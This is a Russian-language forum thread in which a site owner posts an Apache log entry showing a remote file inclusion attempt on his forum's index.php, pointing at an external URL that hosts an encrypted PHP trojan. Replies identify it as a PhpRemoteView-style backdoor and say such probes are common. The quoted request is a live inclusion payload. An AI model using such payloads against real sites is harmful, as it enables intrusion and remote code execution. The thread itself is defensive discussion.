В общем обнаружил я в логах апача вот такой запрос: Код (Text): 24.80.100.94 - - [30/Nov/2007:23:58:05 +0000] "GET /forum/index.php?action=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 24856 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" по адресу http://hotraebywka.chat.ru/images/girl? находится зашифрованный php скрипт. На мой взгляд - какой-то шпион. посылает инфу о хосте куда-то. Кто-нибудь знает чем это можно расшифровать автоматически ? А то в ручную неохота.
mmaavv Что-то наподобие PhpRemoteView. Троян для сайта, если он конечно ухитрится его заинклюдить. Не боись, SMF такими примитивными методами не проймешь
у меня больше десятка таких умников инклуды проверяют в сутки, хотя я сайт то не светил почти негде, не перевелись еще простаки... Или у них принцип - винда, значит надо завалить? %)